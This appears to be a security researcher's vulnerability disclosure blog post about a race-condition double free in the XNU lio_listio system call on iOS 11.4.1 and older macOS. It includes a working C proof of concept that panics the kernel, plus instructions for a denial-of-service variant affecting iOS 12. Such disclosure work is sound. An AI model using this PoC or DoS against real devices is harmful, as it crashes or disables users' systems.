A race for an iOS/macOS sandbox escape

October 8, 2019
Notes

Introduction

Disclosure of an iOS 11.4.1 kernel vulnerability in lio_listio, with a PoC that triggers a kernel panic.

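iOS 12 was released a few weeks ago and brought many security fixes and improvements. In particular, this new version happens to patch a very nice kernel vulnerability that we had found at Synacktiv.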

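It is not clear whether this vulnerability was found internally by Apple or whether it is CVE-2018-4344, reported by the UK's National Cyber Security Centre (NCSC). Since nobody seems to have written about it yet, we analyze it in detail in this blog post!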

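The vulnerability lies in the lio_listio system call and is triggered by a race condition. It can effectively be used to free a kernel object twice, leading to a potential use-after-free (UAF).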

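The bug itself was introduced about nine years ago, between xnu-1228 and xnu-1456, and should be exploitable on most multi-core iOS devices up to and including iOS 11.4.1, and on macOS until the release of 10.14. Internally, we named this vulnerability LightSpeed, because a very tricky race has to be won (and as an excuse to add a few Star Wars memes), but don't worry, we won't turn it into a brand.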

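Because the lio_listio system call is reachable from any sandbox, and because the bug provides some interesting primitives, LightSpeed could probably be used to jailbreak iOS 11.4.1. This post, however, only explains the vulnerability and provides code that triggers a kernel panic.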

Introduction to the AIO system calls

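As defined in POSIX.1b, the XNU kernel offers userland several system calls for performing asynchronous I/O (aio). The standard specifies functions such as aio_read(), aio_write(), lio_listio(), aio_error(), aio_return(), ... These system calls have been implemented in bsd/kern/kern_aio.c since at least XNU-517, and most of the structures are declared in bsd/sys/aio.h.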

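As an introduction to the AIO family, aio_read() and aio_write() are the asynchronous versions of the read() and write() system calls, respectively. Both functions expect a struct aiocb * describing the I/O request to perform: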

struct aiocb {
    int             aio_fildes;     /* File descriptor */
    off_t           aio_offset;     /* File offset */
    volatile void  *aio_buf;        /* Location of buffer */
    size_t          aio_nbytes;     /* Length of transfer */
    int             aio_reqprio;    /* Request priority offset */
    struct sigevent aio_sigevent;   /* Signal number and value */
    int             aio_lio_opcode; /* Operation to be performed */
};

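To perform an I/O request, XNU first converts the user structure into an aio_workq_entry with aio_create_queue_entry(). The kernel then queues the created object on the system aio queue with aio_enqueue_work(). Here are the prototypes of both functions: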

static aio_workq_entry *aio_create_queue_entry(proc_t procp, user_addr_t aiocbp,
                                               void *group_tag, int kindOfIO);

static void aio_enqueue_work(proc_t procp, aio_workq_entry *entryp, int proc_locked);

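Once queued, the scheduled work is ready to be picked up and processed by the aio workers, which are kernel threads running aio_work_thread(). The aio_read() and aio_write() system calls can therefore return immediately, and the status of the aio can be queried later with aio_error() and aio_return().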
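The submit, poll, collect cycle described above can be sketched from userland as follows. This is only a minimal illustration using the standard POSIX calls; the helper name read_async is hypothetical and not part of the original post.

```c
#include <aio.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Read up to len bytes from the start of path through the POSIX AIO API.
 * Returns the byte count reported by aio_return(), or -1 on failure.
 * read_async is a hypothetical helper name used only for this sketch. */
ssize_t read_async(const char *path, char *buf, size_t len)
{
    assert(path != NULL && buf != NULL);

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    struct aiocb cb;
    memset(&cb, 0, sizeof(cb));
    cb.aio_fildes = fd;
    cb.aio_offset = 0;
    cb.aio_buf = buf;
    cb.aio_nbytes = len;
    cb.aio_sigevent.sigev_notify = SIGEV_NONE;

    /* aio_read() only queues the request and returns immediately. */
    if (aio_read(&cb) != 0) {
        close(fd);
        return -1;
    }

    /* Poll the request status until it is no longer in progress. */
    while (aio_error(&cb) == EINPROGRESS)
        usleep(100);

    /* aio_return() consumes the final result of the request. */
    ssize_t n = aio_return(&cb);
    close(fd);
    return n;
}
```

Calling read_async("/etc/hosts", buf, sizeof(buf)) would, under these assumptions, behave like a plain read() from the caller's point of view, except that the I/O itself is carried out asynchronously between aio_read() and aio_return().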

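lio_listio

With the introduction out of the way, let's talk about lio_listio(). This system call is similar to aio_read() and aio_write(), but it is designed to schedule a whole list of aio in a single call. It therefore takes an array of aiocb pointers along with a few other parameters.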

int lio_listio(int mode, struct aiocb *restrict const list[restrict],
               int nent, struct sigevent *restrict sig);

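The mode argument specifies the behavior of the system call and must be one of the following:

LIO_NOWAIT: the aio are scheduled, then the system call returns immediately;
LIO_WAIT: the aio are scheduled, then the system call waits until all of them are done (the call is synchronous).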
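To make the mode argument concrete, here is a small sketch of a LIO_WAIT batch that reads two consecutive chunks of a file in one call. The helper name read_two_chunks is hypothetical; only the POSIX calls themselves come from the standard.

```c
#include <aio.h>
#include <assert.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Read two consecutive chunks of `chunk` bytes from fd with a single
 * lio_listio() call. Returns the total number of bytes read, or -1.
 * read_two_chunks is a hypothetical helper name for this sketch. */
ssize_t read_two_chunks(int fd, char *first, char *second, size_t chunk)
{
    assert(first != NULL && second != NULL);

    struct aiocb cbs[2];
    struct aiocb *list[2] = { &cbs[0], &cbs[1] };
    char *bufs[2] = { first, second };

    memset(cbs, 0, sizeof(cbs));
    for (int i = 0; i < 2; i++) {
        cbs[i].aio_fildes = fd;
        cbs[i].aio_offset = (off_t)(i * chunk);
        cbs[i].aio_buf = bufs[i];
        cbs[i].aio_nbytes = chunk;
        cbs[i].aio_lio_opcode = LIO_READ;
        cbs[i].aio_sigevent.sigev_notify = SIGEV_NONE;
    }

    /* LIO_WAIT: return only once both requests have completed.
     * With LIO_NOWAIT the call would return right after queuing. */
    if (lio_listio(LIO_WAIT, list, 2, NULL) != 0)
        return -1;

    /* Collect the result of each request. */
    ssize_t total = 0;
    for (int i = 0; i < 2; i++) {
        ssize_t n = aio_return(&cbs[i]);
        if (n < 0)
            return -1;
        total += n;
    }
    return total;
}
```

With LIO_NOWAIT instead, the caller would have to poll each entry with aio_error() before calling aio_return(), which is what the PoC later in this post does.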

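In the LIO_WAIT case, the kernel must keep track of the whole batch of aio. Indeed, when the last I/O has been processed, the aio worker thread needs to wake up the user thread that is still waiting in the system call.

So the kernel allocates a struct aio_lio_context to track the batch of I/O (this is done in both modes):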

struct aio_lio_context {
    int     io_waiter;
    int     io_issued;
    int     io_completed;
};
typedef struct aio_lio_context aio_lio_context;

Here is the relevant part of the lio_listio implementation (most of the code has been removed):

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    /* lio_context allocation */
    MALLOC(lio_context, aio_lio_context*, sizeof(aio_lio_context), M_TEMP, M_WAITOK);

    /* userland extraction */
    aiocbpp = aio_copy_in_list(p, uap->aiocblist, uap->nent);

    lio_context->io_issued = uap->nent;

    for ( i = 0; i < uap->nent; i++ ) {
        user_addr_t my_aiocbp;
        aio_workq_entry *entryp;

        *(entryp_listp + i) = NULL;
        my_aiocbp = *(aiocbpp + i);

        /* creation of the aio_workq_entry */
        /* lio_create_entry is a wrapper for aio_create_queue_entry */
        result = lio_create_entry(p, my_aiocbp, lio_context, (entryp_listp+i));
        if ( result != 0 && call_result == -1 )
            call_result = result;

        entryp = *(entryp_listp + i);

        aio_proc_lock_spin(p);
        // [...]
        /* enqueuing of the aio_workq_entry */
        lck_mtx_convert_spin(aio_proc_mutex(p));
        aio_enqueue_work(p, entryp, 1);
        aio_proc_unlock(p);
    }

    // [...]
}

Here we can see that lio_context is tagged onto every aio_workq_entry (as the group_tag parameter of aio_create_queue_entry()). Later, the aio worker thread retrieves this context, updates lio_context->io_completed, and wakes up the user thread if needed.

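The vulnerability: LightSpeed!

The previous section explained how aio_lio_context is used, but one question remains: who is responsible for freeing the context? It depends on the mode of operation.

When lio_listio is called in LIO_NOWAIT mode, the thread in the system call does not wait for all the I/O to complete, so freeing lio_context is the job of the aio workers. This is done in the do_aio_completion routine, after the last aio has been processed: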

static void do_aio_completion( aio_workq_entry *entryp )
{
    // [...]
    lio_context = (aio_lio_context *)entryp->group_tag;

    if (lio_context != NULL) {

        aio_proc_lock_spin(entryp->procp);
        lio_context->io_completed++;

        if (lio_context->io_issued == lio_context->io_completed) {
            lastLioCompleted = TRUE;
        }

        waiter = lio_context->io_waiter;

        /* explicit wakeup of lio_listio() waiting in LIO_WAIT */
        if ((entryp->flags & AIO_LIO_NOTIFY) && (lastLioCompleted) && (waiter != 0)) {
            /* wake up the waiter */
            wakeup(lio_context);
        }

        aio_proc_unlock(entryp->procp);
    }

    // [...]
    if (lastLioCompleted && (waiter == 0))
        free_lio_context (lio_context);

} /* do_aio_completion */

On the other hand, when the caller waits in LIO_WAIT mode, lio_context is freed in lio_listio itself. Here is the relevant part of the end of the system call:

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )
{
    // [...]

    switch(uap->mode) {
    case LIO_WAIT:
        aio_proc_lock_spin(p);
        while (lio_context->io_completed < lio_context->io_issued) {
            result = msleep(lio_context, aio_proc_mutex(p), /*...*/);

            // [...]
        }

        /* If all IOs have finished must free it */
        if (lio_context->io_completed == lio_context->io_issued) {
            free_context = TRUE;
        }

        aio_proc_unlock(p);
        break;

    case LIO_NOWAIT:
        break;
    }

    // [...]

ExitRoutine:
    if ( entryp_listp != NULL )
        FREE( entryp_listp, M_TEMP );
    if ( aiocbpp != NULL )
        FREE( aiocbpp, M_TEMP );
    if ((lio_context != NULL) &&
        ((lio_context->io_issued == 0) || (free_context == TRUE))) {
        free_lio_context(lio_context);
    }

    // [...]

    return( call_result );

} /* lio_listio */

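The code above contains a small bug that can be triggered in LIO_NOWAIT mode. The last test, (lio_context->io_issued == 0), is an error-handling case that frees the context when no I/O was scheduled. This can happen, for example, when the user submits I/O requests that all have LIO_NOP as their aio_lio_opcode (instead of LIO_READ or LIO_WRITE).

However, this check is wrong at the point where it runs: other kernel threads may already have tampered with lio_context, so nothing guarantees that it is still valid.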

Here is the crux!

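If our aio workers are fast enough to execute all of our I/O before the system call ends, lio_context may already have been freed and even reused. Indeed, once an aio is queued, a worker only needs the caller's p_mlock to start working, and lio_listio releases that lock several times.

Therefore, if lio_context has been freed and reused, lio_context->io_issued may be zero. In that case, lio_listio ends by calling free_lio_context() again and ultimately frees another kernel allocation.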
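The two free conditions can be put side by side in a small userland model. This is only a sketch of the logic quoted above, not kernel code: the names lio_ctx_model, worker_frees, syscall_frees_vulnerable and double_free_possible are hypothetical, and the 0x41 filler values are arbitrary.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userland copy of the three counters, for illustration only. */
struct lio_ctx_model {
    int io_waiter;
    int io_issued;
    int io_completed;
};

/* Condition under which the aio worker frees the context in
 * do_aio_completion(), evaluated after io_completed was incremented. */
bool worker_frees(const struct lio_ctx_model *c)
{
    return c->io_issued == c->io_completed && c->io_waiter == 0;
}

/* Condition evaluated at ExitRoutine in the vulnerable lio_listio(). */
bool syscall_frees_vulnerable(const struct lio_ctx_model *c, bool free_context)
{
    return c != NULL && (c->io_issued == 0 || free_context);
}

/* Replays the losing interleaving for a LIO_NOWAIT call with one aio.
 * Returns true when both sides decide to free the same address. */
bool double_free_possible(void)
{
    struct lio_ctx_model ctx = { 0, 1, 0 };  /* no waiter, one aio issued */

    ctx.io_completed++;                      /* the worker finishes the aio */
    bool first_free = worker_frees(&ctx);

    /* The chunk is then reused by an unrelated object whose second
     * 32-bit field happens to be zero; lio_listio() still reads it as
     * a context. free_context is false because the mode is LIO_NOWAIT. */
    struct lio_ctx_model reused = { 0x41, 0, 0x41 };
    bool second_free = syscall_frees_vulnerable(&reused, false);

    assert(first_free || !second_free || reused.io_issued == 0);
    return first_free && second_free;
}
```

In this model double_free_possible() returns true, which mirrors the scenario above: the worker has already released the context, and the stale io_issued == 0 test makes the system call release the same address a second time.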

Triggering the crash

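In summary, the following sequence is needed to trigger the bug:

1. call lio_listio() to allocate an aio_lio_context and schedule some aio, then get context-switched out before the system call ends;
2. the aio worker threads execute all the scheduled I/O and free the aio_lio_context;
3. an allocation in the kalloc.16 zone (the size class of aio_lio_context) reuses the same chunk as the aio_lio_context;
4. zero is written into the second dword of that allocation (to get lio_context->io_issued == 0);
5. a context switch resumes the suspended lio_listio call, which frees the allocation.

Steps 3 and 4 are mandatory. Indeed, because of the allocation size (kalloc.16), a freed chunk always ends up poisoned (in zfree()), so if the allocation is not reused, lio_context->io_issued cannot be zero at step 5. After step 5, if the allocation has not been retained and the kernel tries to free it, the system panics.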
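The five steps, and the reason steps 3 and 4 are required, can be replayed on a 16-byte buffer in userland. This is a toy model under stated assumptions, not the kernel allocator: the poison byte value is arbitrary, and replay, replay_result and the macros are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define CHUNK_SIZE 16    /* element size of the kalloc.16 zone */
#define ISSUED_OFF 4     /* io_issued is the second 32-bit field */
#define POISON     0xde  /* assumed non-zero poison byte, value is arbitrary */

struct replay_result {
    bool syscall_freed;  /* lio_listio() exit path freed the chunk */
    bool chunk_stolen;   /* ...while another object was living in it */
};

/* Replays steps 1 to 5 on one chunk. reuse_chunk selects whether
 * steps 3 and 4 (reuse and zeroed second dword) take place. */
struct replay_result replay(bool reuse_chunk)
{
    struct replay_result r = { false, false };
    unsigned char chunk[CHUNK_SIZE];
    bool owned_by_other = false;
    int32_t io_issued = 1;

    assert(ISSUED_OFF + sizeof(io_issued) <= CHUNK_SIZE);

    /* Step 1: lio_listio() allocates the context and issues one aio. */
    memset(chunk, 0, sizeof(chunk));
    memcpy(chunk + ISSUED_OFF, &io_issued, sizeof(io_issued));

    /* Step 2: the worker completes the aio and frees the context;
     * the freed element is poisoned. */
    memset(chunk, POISON, sizeof(chunk));

    if (reuse_chunk) {
        /* Steps 3 and 4: another allocation takes the same chunk and
         * its second dword is zero. */
        owned_by_other = true;
        memset(chunk + ISSUED_OFF, 0, sizeof(io_issued));
    }

    /* Step 5: lio_listio() resumes and reads io_issued through its
     * stale pointer. */
    memcpy(&io_issued, chunk + ISSUED_OFF, sizeof(io_issued));
    if (io_issued == 0) {
        r.syscall_freed = true;
        r.chunk_stolen = owned_by_other;
    }
    return r;
}
```

Without reuse, the stale read sees the poison pattern, io_issued is non-zero, and the exit path does nothing. With reuse, the exit path frees a chunk that now belongs to someone else, which is the state that ends in a panic once that owner releases it.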

The following code demonstrates this panic (GitHub link: https://github.com/synacktiv/lightspeed):

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <aio.h>
#include <sys/errno.h>
#include <pthread.h>
#include <poll.h>

/* might have to play with those a bit */
#if MACOS_BUILD
#define NB_LIO_LISTIO 1
#define NB_RACER 5
#else
#define NB_LIO_LISTIO 1
#define NB_RACER 30
#endif

#define NENT 1

void *anakin(void *a)
{
    printf("Now THIS is podracing!\n");

    uint64_t err;

    int mode = LIO_NOWAIT;
    int nent = NENT;
    char buf[NENT];
    void *sigp = NULL;

    struct aiocb** aio_list = NULL;
    struct aiocb*  aios = NULL;

    char path[1024] = {0};
#if MACOS_BUILD
    snprintf(path, sizeof(path), "/tmp/lightspeed");
#else
    snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));
#endif

    int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
    if (fd < 0)
    {
        perror("open");
        goto exit;
    }

    /* prepare real aio */
    aio_list = malloc(nent * sizeof(*aio_list));
    if (aio_list == NULL)
    {
        perror("malloc");
        goto exit;
    }

    aios = malloc(nent * sizeof(*aios));
    if (aios == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(aios, 0, nent * sizeof(*aios));
    for(uint32_t i = 0; i < nent; i++)
    {
        struct aiocb* aio = &aios[i];

        aio->aio_fildes = fd;
        aio->aio_offset = 0;
        aio->aio_buf = &buf[i];
        aio->aio_nbytes = 1;
        aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D
        aio->aio_sigevent.sigev_notify = SIGEV_NONE;

        aio_list[i] = aio;
    }

    while(1)
    {
        err = lio_listio(mode, aio_list, nent, sigp);

        for(uint32_t i = 0; i < nent; i++)
        {
            /* check the return err of the aio to fully consume it */
            while(aio_error(aio_list[i]) == EINPROGRESS) {
                usleep(100);
            }
            err = aio_return(aio_list[i]);
        }
    }

exit:
    if(fd >= 0)
        close(fd);

    if(aio_list != NULL)
        free(aio_list);

    if(aios != NULL)
        free(aios);

    return NULL;
}

void *sebulba(void *a)
{
    printf("You're Bantha poodoo!\n");
    while(1)
    {
        /* not mandatory but used to make the race more likely */
        /* this poll() will force a kalloc16 of a struct poll_continue_args */
        /* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
        /* this technique is quite slow (1ms waiting time) and better ways to do so exist */
        int n = poll(NULL, 0, 1);
        if(n != 0)
        {
            /* when the race plays perfectly we might detect it before the crash */
            /* most of the time though, we will just panic without going here */
            printf("poll: %x - kernel crash incoming!\n",n);
        }
    }

    return 0;
}

void crash_kernel()
{
    pthread_t *lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));
    if (lio_listio_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    pthread_t *racers_threads = malloc(NB_RACER  * sizeof(*racers_threads));
    if (racers_threads == NULL)
    {
        perror("malloc");
        goto exit;
    }

    memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));
    memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));

    for(uint32_t i = 0; i < NB_RACER; i++)
    {
        pthread_create(&racers_threads[i], NULL, sebulba, NULL);
    }
    for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
    {
        pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);
    }

    for(uint32_t i = 0; i < NB_RACER; i++)
    {
        pthread_join(racers_threads[i], NULL);
    }
    for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
    {
        pthread_join(lio_listio_threads[i], NULL);
    }

exit:
    return;
}

#if MACOS_BUILD
int main(int argc, char* argv[])
{
    crash_kernel();

    return 0;
}
#endif

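Fix and conclusion

Although the latest XNU sources (4570.71.2) still contain the bug, it was fixed in iOS 12 (at least since beta 4).

Here is the Hex-Rays Decompiler output for the end of the system call:

This code is probably the result of compiling the following: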

if ((free_context == TRUE) && (lio_context != NULL)) {
    free_lio_context(lio_context);
}

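On the one hand, this patch fixes the potential UAF on lio_context. On the other hand, the error case that was handled before the fix is now ignored... It is therefore possible to make lio_listio() allocate an aio_lio_context that the kernel will never free. This gives us a silly DoS that makes recent kernels (including iOS 12) stop responding.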
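The leak introduced by the patch can be illustrated with a tiny model of the two exit checks. This is a sketch of the reasoning only, assuming a LIO_NOWAIT call whose entries are all LIO_NOP; the names exit_check, nop_batch_context_freed and leaked_contexts are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>

/* Which exit check lio_listio() applies before returning. */
enum exit_check { CHECK_VULNERABLE, CHECK_PATCHED };

/* Returns true if the context allocated by one LIO_NOWAIT call whose
 * entries are all LIO_NOP is released at ExitRoutine. With no I/O
 * scheduled, io_issued is 0, free_context stays false (it is only set
 * in LIO_WAIT mode) and no aio worker ever runs for this context. */
bool nop_batch_context_freed(enum exit_check check)
{
    assert(check == CHECK_VULNERABLE || check == CHECK_PATCHED);

    int io_issued = 0;
    bool free_context = false;

    if (check == CHECK_VULNERABLE)
        return io_issued == 0 || free_context;  /* old error path */
    return free_context;                        /* patched check */
}

/* Number of contexts still allocated after `calls` such system calls. */
unsigned long leaked_contexts(enum exit_check check, unsigned long calls)
{
    return nop_batch_context_freed(check) ? 0 : calls;
}
```

Under the old check every such context is released by the error path; under the patched check none is, so each call permanently consumes one kalloc.16 element.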

To test it, simply change LIO_READ to LIO_NOP in the PoC and set NB_RACER to 0.

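Finally, we are glad to disclose this vulnerability in this blog post and we hope you enjoyed it. The bug is still triggerable on iOS 11.4.1, so one could try to build a jailbreak from it (although it might be easier with other disclosed vulnerabilities).

As for the rest, time will tell whether Apple patches the small DoS they introduced :D

Many thanks to my colleagues for their help with this blog post.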

Original link: https://www.synacktiv.com/posts/exploit/lightspeed-a-race-for-an-iosmacos-sandbox-escape.html?tdsourcetag=spcqqaiomsg